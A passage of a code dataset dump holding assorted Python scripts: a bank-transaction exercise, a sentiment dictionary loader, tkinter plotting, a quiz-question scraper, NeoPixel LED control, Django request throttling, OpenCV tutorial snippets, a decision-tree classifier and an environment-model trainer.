pAreaDilated.shape[1], ' trials')\n\n\n\n\n","sub_path":"dannybrown/interim/comparison1Plot_DBcompleted.py","file_name":"comparison1Plot_DBcompleted.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"91935238","text":"# Write a program that computes the net amount of a bank account based a transaction log from console input. \n# The transaction log format is shown as following:\n# D 100 (D --> deposit)\n# W 200 (W --> withdrawal)\n\n# Input :\n# D 300\n# D 300\n# W 200\n# D 100\n# Output : 500\n\ndepo = withd = 0\nwhile True:\n\tdata = input()\n\tif not data:\n\t\tbreak\n\tv = data.split(' ')\n\tfor i in range(len(v)):\n\t\tif v[i] is 'D':\n\t\t\tdepo += int(v[i+1])\n\t\tif v[i] is 'W':\n\t\t\twithd += int(v[i+1])\nprint(depo-withd)\n\t","sub_path":"100_17_bank.py","file_name":"100_17_bank.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"480451370","text":"\r\nimport pandas as pd\r\n\r\ndef load_masterdictionary(file_path, stopwords_file, print_flag=False, f_log=None, get_other=False):\r\n _master_dictionary = {}\r\n _sentiment_categories = ['negative', 'positive', 'uncertainty', 'litigious', 'constraining',\r\n 'strong_modal', 'moderate_modal','weak_modal']\r\n\r\n\r\n _stopwords = pd.read_csv(stopwords_file, header=None)\r\n\r\n _stopwords = [val.lower() for sublist in _stopwords.values for val in sublist]\r\n\r\n #_stopwords = [word.lower() for word in _stopwords]\r\n\r\n\r\n with open(file_path) as f:\r\n _total_documents = 0\r\n _md_header = f.readline()\r\n for line in f:\r\n cols = line.split(',')\r\n\r\n _master_dictionary[cols[0].lower()] = MasterDictionary(cols, _stopwords)\r\n _total_documents += _master_dictionary[cols[0].lower()].doc_count\r\n if len(_master_dictionary) % 5000 == 0 and print_flag:\r\n print('\\r ...Loading Master Dictionary' + ' {}'.format(len(_master_dictionary)), end='', flush=True)\r\n\r\n if print_flag:\r\n print('\\r', end='') # clear line\r\n print('\\nMaster Dictionary loaded from file: \\n ' + file_path)\r\n print(' {0:,} words loaded in master_dictionary.'.format(len(_master_dictionary)) + '\\n')\r\n\r\n\r\n if f_log:\r\n try:\r\n f_log.write('\\n\\n load_masterdictionary log:')\r\n f_log.write('\\n Master Dictionary loaded from file: \\n ' + file_path)\r\n f_log.write('\\n {0:,} words loaded in master_dictionary.\\n'.format(len(_master_dictionary)))\r\n except Exception as e:\r\n print('Log file in load_masterdictionary is not available for writing')\r\n print('Error = {0}'.format(e))\r\n\r\n if get_other:\r\n return _master_dictionary, _md_header, _sentiment_categories, _stopwords\r\n else:\r\n return _master_dictionary\r\n\r\n\r\ndef create_sentimentdictionaries(_master_dictionary, _sentiment_categories, negation_list=None):\r\n\r\n _sentiment_dictionary = {}\r\n for category in _sentiment_categories:\r\n _sentiment_dictionary[category] = {}\r\n # Create dictionary of sentiment dictionaries with count set = 0\r\n for word in _master_dictionary.keys():\r\n for category in _sentiment_categories:\r\n if _master_dictionary[word].sentiment[category]:\r\n _sentiment_dictionary[category][word] = 0\r\n\r\n if negation_list is not None:\r\n _sentiment_dictionary['negation'] = {}\r\n\r\n for word in negation_list:\r\n _sentiment_dictionary['negation'][word] = 0\r\n\r\n return _sentiment_dictionary\r\n\r\n\r\nclass MasterDictionary:\r\n def __init__(self, cols, _stopwords):\r\n self.word = cols[0].lower()\r\n self.sequence_number = int(cols[1])\r\n self.word_count = int(cols[2])\r\n self.word_proportion = float(cols[3])\r\n self.average_proportion = float(cols[4])\r\n self.std_dev_prop = float(cols[5])\r\n self.doc_count = int(cols[6])\r\n self.negative = int(cols[7])\r\n self.positive = int(cols[8])\r\n self.uncertainty = int(cols[9])\r\n self.litigious = int(cols[10])\r\n self.constraining = int(cols[11])\r\n self.superfluous = int(cols[12])\r\n self.interesting = int(cols[13])\r\n self.modal_number = int(cols[14])\r\n self.strong_modal = False\r\n if int(cols[14]) == 1:\r\n self.strong_modal = True\r\n self.moderate_modal = False\r\n if int(cols[14]) == 2:\r\n self.moderate_modal = True\r\n self.weak_modal = False\r\n if int(cols[14]) == 3:\r\n self.weak_modal = True\r\n self.sentiment = {}\r\n self.sentiment['negative'] = bool(self.negative)\r\n self.sentiment['positive'] = bool(self.positive)\r\n self.sentiment['uncertainty'] = bool(self.uncertainty)\r\n self.sentiment['litigious'] = bool(self.litigious)\r\n self.sentiment['constraining'] = bool(self.constraining)\r\n self.sentiment['strong_modal'] = bool(self.strong_modal)\r\n self.sentiment['moderate_modal'] = bool(self.moderate_modal)\r\n self.sentiment['weak_modal'] = bool(self.weak_modal)\r\n self.irregular_verb = int(cols[15])\r\n self.harvard_iv = int(cols[16])\r\n self.syllables = int(cols[17])\r\n self.source = cols[18]\r\n\r\n if self.word in _stopwords:\r\n self.stopword = True\r\n else:\r\n self.stopword = False\r\n return\r\n","sub_path":"load_MasterDictionary.py","file_name":"load_MasterDictionary.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190605724","text":"import tkinter\n\n\ndef parabola(par_x):\n return list(map(lambda x: (x ** 2) / 100, par_x))\n\n\ndef draw_axes(par_canvas):\n par_canvas.update()\n x_origin = par_canvas.winfo_width() / 2\n y_origin = par_canvas.winfo_height() / 2\n par_canvas.configure(scrollregion=(-x_origin, -y_origin, x_origin, y_origin))\n par_canvas.create_line(-x_origin, 0, x_origin, 0, fill=\"black\")\n par_canvas.create_line(0, -y_origin, 0, y_origin, fill=\"black\")\n\n\ndef draw_parabola(par_canvas):\n par_canvas.update()\n xes = range(-320, 320, 1)\n # ratio = parCanvas.winfo_width() / 100\n ratio = 1\n ratio2 = 100 / par_canvas.winfo_height()\n print(ratio)\n for i in range(len(xes) - 1):\n par_canvas.create_line(xes[i] * ratio, ratio2 * parabola(xes[i] * ratio), xes[i + 1] * ratio,\n ratio2 * parabola(xes[i + 1] * ratio), fill=\"black\")\n\n\ndef plot(par_canvas, par_x, par_y):\n par_canvas.update()\n for i in range(len(par_x) - 1):\n par_canvas.create_line(par_x[i], -par_y[i], par_x[i + 1],\n -par_y[i + 1], fill=\"black\")\n\n\nmainWindow = tkinter.Tk()\nmainWindow.title(\"Parabola\")\nmainWindow.geometry(\"640x480\")\n\ncanvas = tkinter.Canvas(mainWindow, width=320, height=480)\ncanvas.grid(row=0, column=0)\ncanvas2 = tkinter.Canvas(mainWindow, width=320, height=480)\ncanvas2.grid(row=0, column=1)\nprint(repr(canvas), repr(canvas2))\ndraw_axes(canvas)\ndraw_axes(canvas2)\nX = list(range(-100, 100, 1))\nprint(X)\nY = parabola(X)\nprint(Y)\nplot(canvas, X, Y)\n\nmainWindow.mainloop()\n","sub_path":"Section_11/95_lecture.py","file_name":"95_lecture.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414715207","text":"import pandas as pd\r\nimport requests\r\nfrom lxml import html\r\nfrom pandas import ExcelWriter\r\nimport numpy as np\r\n\r\ndf = pd.DataFrame(columns=['Question','Answer'])\r\n# print (df)\r\n\r\nhp_link = \"https://www.gktoday.in/general-knowledge/\"\r\n\r\npage = requests.get(hp_link)\r\ndoc = html.fromstring(page.content)\r\n\r\nsections = np.array([])\r\n# topics = np.array([])\r\nfor i in range(1,20):\r\n try:\r\n x_path = '/html/body/div[1]/div[2]/div/aside/div[2]/ul/li[' + str(i) + ']/a'\r\n section = doc.xpath(x_path)[0].get(\"href\")\r\n sections = np.append(sections, section)\r\n # topics = np.append(topics, section.split('https://www.gktoday.in/quizbase/', 1)[-1])\r\n except (ValueError,IndexError):\r\n # print (i)\r\n continue\r\nsections = np.unique(sections)\r\n# print (sections)\r\n# print (topics)\r\n\r\n# section = sections[0]\r\n# print (section)\r\n\r\nindex = 0\r\nfor section in sections:\r\n page_link = section + '?pageno=1'\r\n page = requests.get(page_link)\r\n doc = html.fromstring(page.content)\r\n max_page = int(doc.xpath('/html/body/div[1]/div[2]/div/div/div[2]/article/div/ul/li[1]')[0].text_content().split('Page 1 of ', 1)[-1])\r\n # print (max_page)\r\n for page_no in range(1, max_page+1):\r\n page_link = section + '?pageno=' + str(page_no)\r\n # print (page_link)\r\n page = requests.get(page_link)\r\n doc = html.fromstring(page.content)\r\n for i in range(1,11):\r\n try:\r\n ques_x_path = '/html/body/div[1]/div[2]/div/div/div[2]/article/div/div[' + str(i) + ']/div[1]/p'\r\n ans_x_path = '/html/body/div[1]/div[2]/div/div/div[2]/article/div/div[' + str(i) + ']/div[3]/div[1]'\r\n ques = doc.xpath(ques_x_path)[0].text_content()\r\n ans = doc.xpath(ans_x_path)[0].text_content().split('[', 1)[-1].split(']', 1)[0]\r\n df.loc[index] = [ques, ans]\r\n index += 1\r\n except (ValueError,IndexError):\r\n # print (i)\r\n break\r\n print (section, page_no, max_page)\r\n\r\nwriter = ExcelWriter('gkques.xlsx')\r\ndf.to_excel(writer,'qna')\r\nwriter.save()\r\n\r\nprint (\"done\")","sub_path":"gktoday-gk-leecher.py","file_name":"gktoday-gk-leecher.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"394249379","text":"# -*- coding: utf-8 -*-\nimport queue\nimport random\n\nif __name__ == \"__main__\":\n q = queue.PriorityQueue()\n \n data = random.sample(range(1, 100), 5)\n print(\"Orignal data:\", data)\n \n for i in data:\n q.put(i)\n \n print(\"Priority queue:\")\n while not q.empty():\n print(q.get(), end=' ')\n print()","sub_path":"standard/010.queue/priority_queue.py","file_name":"priority_queue.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"65803651","text":"import neopixel\nimport board\nfrom random import randrange\nfrom time import sleep\n\n# definitions of functions\ndef rgb_to_grb_and_brightness(rgb, userbrightness):\n r, g, b = rgb\n ledpower = r * g * b # 255 255 255 would be 16,581,375\n\n if ledpower >= 3375000: # this is 150 150 150\n brightness = 0.3 * userbrightness\n else:\n brightness = 0.6 * userbrightness\n\n return (int(g * brightness), int(r * brightness), int(b * brightness))\n\nsettings_file = open(\"settings.txt\", \"rt\")\n\nbrightness_value_ = settings_file.readline()\nbrightness_value_ = brightness_value_.replace(\"brightness = \", \"\")\nbrightness_value_ = brightness_value_.replace(\"\\n\", \"\")\nbrightness_value = float(brightness_value_)\nbrightness_value = brightness_value / 100\n\ncolor1_ = settings_file.readline()\ncolor2_ = settings_file.readline()\ncolor3_ = settings_file.readline()\n\ncolor1_ = color1_.replace(\"color1 = \", \"\")\ncolor1_ = color1_.replace(\"\\n\", \"\")\ncolor2_ = color2_.replace(\"color2 = \", \"\")\ncolor2_ = color2_.replace(\"\\n\", \"\")\ncolor3_ = color3_.replace(\"color3 = \", \"\")\ncolor3_ = color3_.replace(\"\\n\", \"\")\n\ncolor1 = int(color1_)\ncolor2 = int(color2_)\ncolor3 = int(color3_)\n\ncolor_value = (color1, color2, color3)\n\nmode_ = settings_file.readline()\nmode_ = mode_.replace(\"mode = \", \"\")\nmode_ = mode_.replace(\"\\n\", \"\")\nmode = mode_\n\ndelay_ = settings_file.readline()\ndelay_ = delay_.replace(\"delayrainbow = \", \"\")\ndelay_ = delay_.replace(\"\\n\", \"\")\ndelay = int(delay_)\n\nprint(color_value)\nprint(brightness_value)\nprint(mode)\nprint(delay)\n\nboardleds = neopixel.NeoPixel(board.D4, 117)\n\nfor x in range(0, 10):\n if mode == \"rainbow\":\n while True:\n for pixel in range(0, 117):\n boardleds[pixel] = (int(randrange(0, 255) * brightness_value), int(randrange(0, 255) * brightness_value), int(randrange(0, 255) * brightness_value))\n sleep(float(delay)/1000)\n elif mode == \"setcolor\":\n while True:\n for pixel in range(0, 117):\n boardleds[pixel] = rgb_to_grb_and_brightness(color_value, brightness_value)\n else:\n mode = \"rainbow\"\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"368226418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#  @Time    : 2021/3/13 10:32\n#  @Author  : Wowspring\n#  @Site    :\n#  @File    : BackgroundReplace.py\n#  @Software: PyCharm\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nimage = mpimg.imread(\"../img/certificate.jpg\")\nimage = np.copy(image)\nprint('this image is:', type(image), 'with dimensions:', image.shape)\n\ngray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\nplt.imshow(gray_image, cmap='gray')\nplt.show()\nlower_gray = np.array(235)\nupper_gray = np.array(255)\n\nmask = cv2.inRange(gray_image, lower_gray, upper_gray)\nplt.imshow(mask, cmap='gray')\nplt.show()\n\n# 腐蚀膨胀\nerode = cv2.erode(mask, None, iterations=1)\n# plt.imshow(erode)\n# plt.show()\ndilate = cv2.dilate(erode, None, iterations=1)\n# plt.imshow(dilate)\n# plt.show()\nmasked_img = np.copy(image)\nmasked_img[dilate != 0] = [0, 0, 0]\nplt.imshow(masked_img)\nplt.show()\n\n# Background img\nbackground_image = mpimg.imread('../img/sky2.jpeg')\ncrop_background_image = background_image[0:masked_img.shape[0], 0:masked_img.shape[1]]\nplt.imshow(crop_background_image)\nprint('Image dimensions:', crop_background_image.shape)\nplt.show()\n\ncrop_background = np.copy(crop_background_image)\ncrop_background[dilate == 0] = [0, 0, 0]\nplt.imshow(crop_background)\nplt.show()\n\nprint('Masked Image dimensions:', masked_img.shape)\nprint('background Image dimensions:', crop_background.shape)\n\ncomplete_image = masked_img + crop_background\nplt.imshow(complete_image)\nplt.show()\n\nmpimg.imsave('../img/certificateandsky.jpg', complete_image)\n","sub_path":"120181080223-姚鹏飞-作业2/src/BackgroundReplace.py","file_name":"BackgroundReplace.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"91176995","text":"import math, csv, operator, json\nfrom collections import defaultdict\nfrom random import shuffle\n\n### For splitting the continuous variables #################\ndef mean(data):\n return sum(x for x in data)/float(len(data))\n\ndef variance(data):\n m = mean(data)\n return sum((x-m)**2 for x in data)/float(len(data))\n\ndef sigma(data):\n return math.sqrt(variance(data))\n############################################\n \nclass Node:\n \"\"\" Data container for each node of the decision tree. Implements methods for computing entropy and information gain, as well as splitting the data. \"\"\"\n def __init__(self, data, attr=None, attr_value=None, parent=None):\n self.data = data\n self.attr = attr\n self.attr_value = attr_value\n #self.prev_split_idx = prev_split_idx\n self.parent = parent\n self.entropy = self.get_entropy()\n self.best_split_idx, self.best_split_gain = self.best_split()[0], self.best_split()[1]\n \n def get_entropy(self, attr=None):\n \"\"\" Computes the entropy of the entire node when attr=None or of the node created by selecting for attr. See split_data() for explanation of how continuous variables are handled. \"\"\"\n if attr:\n if len(attr) == 3:\n m = attr[2][0]\n s = attr[2][1]\n i = attr[0]\n attr = attr[1]\n counts = defaultdict(float)\n for row in self.data:\n if attr and attr not in ['under', 'over', 'within']:\n if row[i] == attr:\n counts[row[-1]] += 1 # row[-1] is the classification label or the training instance\n elif attr == 'under':\n if row[i] < m-s:\n counts[row[-1]] += 1\n elif attr == 'over':\n if row[i] > m+s:\n counts[row[-1]] += 1\n elif attr == 'within':\n if row[i] <= m+s and row[i] >= m-s:\n counts[row[-1]] += 1\n else:\n counts[row[-1]] += 1\n \n return -sum(count/sum(counts.values())*math.log(count/sum(counts.values()), 2) for count in counts.itervalues())\n \n def information_gain(self, field_index, c=None):\n \"\"\" Computes the information gain associated with splitting on field_index \"\"\"\n current_entropy = self.get_entropy()\n counts = defaultdict(float)\n if not c:\n for row in self.data:\n counts[row[field_index]] += 1\n else:\n m = c[0]\n s = c[1]\n for row in self.data:\n if row[field_index] < m-s:\n counts['under'] += 1\n elif row[field_index] > m+s:\n counts['over'] += 1\n else:\n counts['within'] += 1\n if not c:\n split_entropy = sum(count/sum(counts.values())*self.get_entropy((field_index, key)) for key, count in counts.iteritems())\n else:\n split_entropy = sum(count/sum(counts.values())*self.get_entropy((field_index, key, c)) for key, count in counts.iteritems())\n \n return current_entropy - split_entropy \n \n def best_split(self):\n \"\"\" Returns (index, information_gain) for the field that generates the highest information gain. \"\"\"\n gains = defaultdict(float)\n for i in range(0, len(self.data[0])-1):\n if type(self.data[0][i]) == str:\n gains[i] = self.information_gain(i)\n else:\n attrs = [row[i] for row in self.data]\n gains[i] = self.information_gain(i, (mean(attrs), sigma(attrs)) )\n return max(gains.iteritems(), key=operator.itemgetter(1)) \n \n def split_data(self):\n \"\"\" Splits the data on self.best_split_idx, which is the index returned by best_split(). Continuous variables are split into 3 bins: values under, within, or over a 2*sigma-wide interval centered on the mean of all values in the list self.data[self.best_split_idx]. \"\"\"\n best = self.best_split_idx\n new_data = defaultdict(list)\n if type(self.data[0][best]) == str:\n c = 'str'\n for row in self.data:\n new_data[row[best]].append(row)\n else:\n attrs = [row[best] for row in self.data]\n m = mean(attrs)\n s = sigma(attrs)\n c = (m, s)\n for row in self.data:\n if row[best] > m+s:\n new_data['over'].append(row)\n elif row[best] < m-s:\n new_data['under'].append(row)\n else:\n new_data['within'].append(row)\n return (new_data, c)\n \n def get_class_counts(self):\n \"\"\" Return the number of instances in each class within the node. \"\"\"\n counts = defaultdict(float)\n for row in self.data:\n counts[row[-1]] += 1\n return counts\n \ndef Tree(node, attr='root'):\n \"\"\" Builds the decision tree using Node class as a data container. \"\"\"\n name = attr\n node_info = {'name': name, 'parent': node.parent, 'node': node}\n \n children = []\n entropy = node.entropy\n if entropy < 0.45 or len(node.data) < 80: # Stop splitting. Values found via parameter sweep.\n node_info['leaf'] = True\n label = max(node.get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n node_info['children'] = label \n return node_info\n else: # Split node. \n node_info['children'] = defaultdict(Tree)\n node_info['leaf'] = False\n best = node.best_split_idx\n split_attr = node.split_data()\n split_attr, c = split_attr[0], split_attr[1]\n node_info['split_on'] = best\n if type(c) == str:\n node_info['split_mean'] = c\n else:\n node_info['split_mean'] = c[0]\n node_info['split_sigma'] = c[1]\n for key, data in split_attr.items():\n node_info['children'][key] = Tree(Node(data, best, key, name), key)\n return node_info\n \ndef classify(tree, instance):\n \"\"\" Recursively traverses tree along a path determined by instance attributes until a leaf is found. The value of tree['children'] is the class label. If a path does not match the instance attribute, max(count(class)) of all data in the current node of the tree is the prediction. \"\"\"\n if tree.get('leaf'):\n return tree.get('children')\n else:\n ind = tree.get('split_on')\n val = instance[ind]\n if type(val) == str:\n if val in tree.get('children').keys():\n next_node = tree.get('children').get(val)\n else:\n return max(tree.get('node').get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n else:\n m = tree.get('split_mean')\n s = tree.get('split_sigma')\n if val > m+s:\n next_node = tree.get('children').get('over')\n elif val < m-s:\n next_node = tree.get('children').get('under')\n else:\n next_node = tree.get('children').get('within')\n if next_node==None:\n return max(tree.get('node').get_class_counts().iteritems(), key=operator.itemgetter(1))[0]\n else:\n predict = classify(next_node, instance)\n return predict\n \n \ndef jsonTree(tree):\n \"\"\" Build a structure to output into a JSON file for debugging the algorithm \"\"\"\n node = {'name': tree['name'], 'parent': tree['parent']}\n children = tree['children']\n node['children'] = list()\n if type(children) is str:\n node['children'].append({'name': children})\n return node\n else:\n for child in children.itervalues():\n node['children'].append(jsonTree(child))\n return node\n \nif __name__ == \"__main__\":\n \n with open(\"hw4-task1-data.tsv\") as tsv:\n data = [list(line) for line in csv.reader(tsv, delimiter=\"\\t\")]\n \n int_ind = [0, 2, 4, 10, 11, 12]\n for row in data:\n for i, item in enumerate(row):\n if i in int_ind:\n row[i] = int(row[i])\n \n # Split training/test sets\n accuracy = []\n shuffle(data) # Mix it up\n K = 10\n chunk = len(data)/K\n for i in range(K):\n try:\n training_set = data[i*chunk:(i+1)*chunk]\n if i == 0:\n test_set = data[(i+1)*chunk:]\n elif i == 9:\n test_set = data[:len(data)-chunk]\n else:\n test_set = [item for sublist in [data[:i*chunk], data[(i+1)*chunk:]] for item in sublist]\n \n print('training on fold # ' + str(i))\n tree = Tree(Node(training_set))\n print ('fold # ' +str(i) + ' trained!')\n \n results = []\n for instance in test_set:\n result = classify(tree, instance)\n results.append(result == instance[-1])\n \n accuracy.append(float(results.count(True))/float(len(results)))\n except RuntimeError:\n print ('Failure at fold ' +str(i)+'. Maximum recursion depth exceeded.')\n print (\"Worst Accuracy:\\t %f\" % (min(accuracy)*100.0))\n print (\"Best Accuracy:\\t %f\" % (max(accuracy)*100.0))\n print (\"Avg Accuracy:\\t %f\" % (mean(accuracy)*100.0))\n avg_accuracy = mean(accuracy) # average accuracy across test sets from each fold\n \n # Writing results to a file \n f = open(\"result.txt\", \"w\")\n f.write(\"accuracy: %.4f\" % avg_accuracy)\n f.close()\n \n # json_data = jsonTree(tree)\n \n # with open('data.json', 'w') as outfile:\n # json.dump(json_data, outfile, sort_keys=True, indent=4, ensure_ascii=False)\n ","sub_path":"dtree.py","file_name":"dtree.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17233648","text":"from datetime import timedelta\n\nfrom django.utils import timezone\nfrom django.core.mail import mail_managers\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom froide.helper.date_utils import format_seconds\n\n\ndef throttle(qs, throttle_config, date_param='first_message'):\n if throttle_config is None:\n return False\n\n # Return True if the next request would break any limit\n for count, seconds in throttle_config:\n f = {\n '%s__gte' % date_param: timezone.now() - timedelta(seconds=seconds)\n }\n if qs.filter(**f).count() + 1 > count:\n return (count, seconds)\n return False\n\n\ndef check_throttle(user, klass):\n if user.is_authenticated and not user.trusted():\n throttle_settings = settings.FROIDE_CONFIG.get('request_throttle', None)\n qs, date_param = klass.objects.get_throttle_filter(user)\n throttle_kind = throttle(qs, throttle_settings, date_param=date_param)\n if throttle_kind:\n mail_managers(_('User exceeded request limit'), user.pk)\n return _('You exceeded your request limit of {count} requests in {time}.'\n ).format(count=throttle_kind[0],\n time=format_seconds(throttle_kind[1])\n )\n","sub_path":"froide/foirequest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38450087","text":"'''\nHere we will learn to extract some frequently used properties of objects like \nSolidity, Equivalent Diameter, Mask image, Mean Intensity etc. More features \ncan be found at Matlab regionprops documentation.\n\n*(NB : Centroid, Area, Perimeter etc also belong to this category, but we have \nseen it in last chapter)*\n1. Aspect Ratio\n\nIt is the ratio of width to height of bounding rect of the object.\n'''\n\nAspectRatio=WidthHeight\nx,y,w,h = cv.boundingRect(cnt)\naspect_ratio = float(w)/h\n'''\n\n2. Extent\n\nExtent is the ratio of contour area to bounding rectangle area.\n'''\nExtent=ObjectAreaBoundingRectangleArea\narea = cv.contourArea(cnt)\nx,y,w,h = cv.boundingRect(cnt)\nrect_area = w*h\nextent = float(area)/rect_area\n\n'''\n3. Solidity\n\nSolidity is the ratio of contour area to its convex hull area.\n'''\nSolidity=ContourAreaConvexHullArea\narea = cv.contourArea(cnt)\nhull = cv.convexHull(cnt)\nhull_area = cv.contourArea(hull)\nsolidity = float(area)/hull_area\n\n'''\n4. Equivalent Diameter\n\nEquivalent Diameter is the diameter of the circle whose area is same as the contour area.\n\n'''\n\narea = cv.contourArea(cnt)\nequi_diameter = np.sqrt(4*area/np.pi)\n\n'''\n5. Orientation\n\nOrientation is the angle at which object is directed. Following method also gives the Major Axis and Minor Axis lengths.\n'''\n\n(x,y),(MA,ma),angle = cv.fitEllipse(cnt)\n\n'''\n\n6. Mask and Pixel Points\n\nIn some cases, we may need all the points which comprises that object. It can be done as follows:\n'''\n \nmask = np.zeros(imgray.shape,np.uint8)\ncv.drawContours(mask,[cnt],0,255,-1)\npixelpoints = np.transpose(np.nonzero(mask))\n#pixelpoints = cv.findNonZero(mask)\n\n'''\nHere, two methods, one using Numpy functions, next one using OpenCV function (last commented line) are given to do the same. Results are also same, but with a slight difference. Numpy gives coordinates in **(row, column)** format, while OpenCV gives coordinates in **(x,y)** format. So basically the answers will be interchanged. Note that, row = x and column = y.\n7. Maximum Value, Minimum Value and their locations\n\nWe can find these parameters using a mask image.\nmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(imgray,mask = mask)\n8. Mean Color or Mean Intensity\n\nHere, we can find the average color of an object. Or it can be average intensity of the object in grayscale mode. We again use the same mask to do it.\nmean_val = cv.mean(im,mask = mask)\n9. Extreme Points\n\nExtreme Points means topmost, bottommost, rightmost and leftmost points of the object.\n'''\n\nleftmost = tuple(cnt[cnt[:,:,0].argmin()][0])\nrightmost = tuple(cnt[cnt[:,:,0].argmax()][0])\ntopmost = tuple(cnt[cnt[:,:,1].argmin()][0])\nbottommost = tuple(cnt[cnt[:,:,1].argmax()][0])\n\n'''\nFor eg, if I apply it to an Bangladesh map, I get the following result :\n''' ","sub_path":"4. ImageProcessing/10.3_Contour_Properties.py","file_name":"10.3_Contour_Properties.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"219064679","text":"import os\nimport sys\nimport tqdm\nimport torch\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom types import SimpleNamespace\nfrom src.envs import all_envs\nfrom src.utils.logger import Logger\nfrom src.data.loaders import RolloutSequenceDataset\nfrom src.models.pytorch import EnvModel\nfrom src.models import all_envmodels, all_models, get_config\n\nclass Trainer():\n\tdef __init__(self, config):\n\t\tself.dataset_train = RolloutSequenceDataset(config, train=True)\n\t\tself.dataset_test = RolloutSequenceDataset(config, train=False)\n\t\tself.train_loader = torch.utils.data.DataLoader(self.dataset_train, batch_size=config.batch_size, shuffle=True, num_workers=config.nworkers)\n\t\tself.test_loader = torch.utils.data.DataLoader(self.dataset_test, batch_size=config.batch_size, shuffle=False, num_workers=config.nworkers)\n\n\tdef train_loop(self, ep, envmodel, update=1):\n\t\tbatch_losses = []\n\t\tenvmodel.network.train()\n\t\twith tqdm.tqdm(total=len(self.dataset_train)) as pbar:\n\t\t\tpbar.set_description_str(f\"Train Ep: {ep}, \")\n\t\t\tfor i,(states, actions, next_states, rewards, dones) in enumerate(self.train_loader):\n\t\t\t\tloss = envmodel.network.optimize(states, actions, next_states, rewards, dones)\n\t\t\t\tif i%update == 0:\n\t\t\t\t\tpbar.set_postfix_str(f\"Loss: {loss:.4f}\")\n\t\t\t\t\tpbar.update(states.shape[0]*update)\n\t\t\t\tbatch_losses.append(loss)\n\t\treturn np.mean(batch_losses)\n\n\tdef test_loop(self, ep, envmodel):\n\t\tbatch_losses = []\n\t\tenvmodel.network.eval()\n\t\twith torch.no_grad():\n\t\t\tfor states, actions, next_states, rewards, dones in self.test_loader:\n\t\t\t\tloss = envmodel.network.get_loss(states, actions, next_states, rewards, dones).item()\n\t\t\t\tbatch_losses.append(loss)\n\t\treturn np.mean(batch_losses)\n\ndef train(make_env, config):\n\ttrainer = Trainer(config)\n\tenvmodel = EnvModel(config.state_size, config.action_size, config, load=\"\", gpu=True)\n\tcheckpoint = f\"{config.env_name}\"\n\tlogger = Logger(trainer, envmodel.network, config)\n\tep_train_losses = []\n\tep_test_losses = []\n\tfor ep in range(config.epochs):\n\t\ttrain_loss = trainer.train_loop(ep, envmodel)\n\t\ttest_loss = trainer.test_loop(ep, envmodel)\n\t\tep_train_losses.append(train_loss)\n\t\tep_test_losses.append(test_loss)\n\t\tenvmodel.network.schedule(test_loss)\n\t\tif ep_test_losses[-1] <= np.min(ep_test_losses): envmodel.network.save_model(checkpoint)\n\t\tlogger.log(f\"Step: {ep:7d}, Reward: {ep_test_losses[-1]:9.3f} [{ep_train_losses[-1]:8.3f}], Avg: {np.mean(ep_test_losses, axis=0):9.3f} ({1.0:.3f})\", envmodel.network.get_stats())\n\ndef parse_args(envs, models, envmodels):\n\tparser = argparse.ArgumentParser(description=\"MDRNN Trainer\")\n\tparser.add_argument(\"env_name\", type=str, choices=envs, help=\"Name of the environment to use. Allowed values are:\\n\"+', '.join(envs), metavar=\"env_name\")\n\tparser.add_argument(\"envmodel\", type=str, default=None, choices=envmodels, help=\"Which model to use as the dynamics. Allowed values are:\\n\"+', '.join(envmodels), metavar=\"envmodels\")\n\tparser.add_argument(\"--model\", type=str, default=None, choices=models, help=\"Which RL algorithm to use as the agent. Allowed values are:\\n\"+', '.join(models), metavar=\"model\")\n\tparser.add_argument(\"--nworkers\", type=int, default=0, help=\"Number of workers to use to load dataloader\")\n\tparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of epochs to train the envmodel\")\n\tparser.add_argument(\"--seq_len\", type=int, default=40, help=\"Length of sequence to train RNN\")\n\tparser.add_argument(\"--batch_size\", type=int, default=256, help=\"Size of batch to train RNN\")\n\tparser.add_argument(\"--train_prop\", type=float, default=0.9, help=\"Proportion of trajectories to use for training\")\n\treturn parser.parse_args()\n\nif __name__ == \"__main__\":\n\targs = parse_args(all_envs, list(all_models.values())[0].keys(), all_envmodels)\n\tmake_env, _, config = get_config(args.env_name, args.model)\n\tconfig.update(**args.__dict__)\n\ttrain(make_env=make_env, config=config)\n\t\t","sub_path":"train_envmodel.py","file_name":"train_envmodel.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 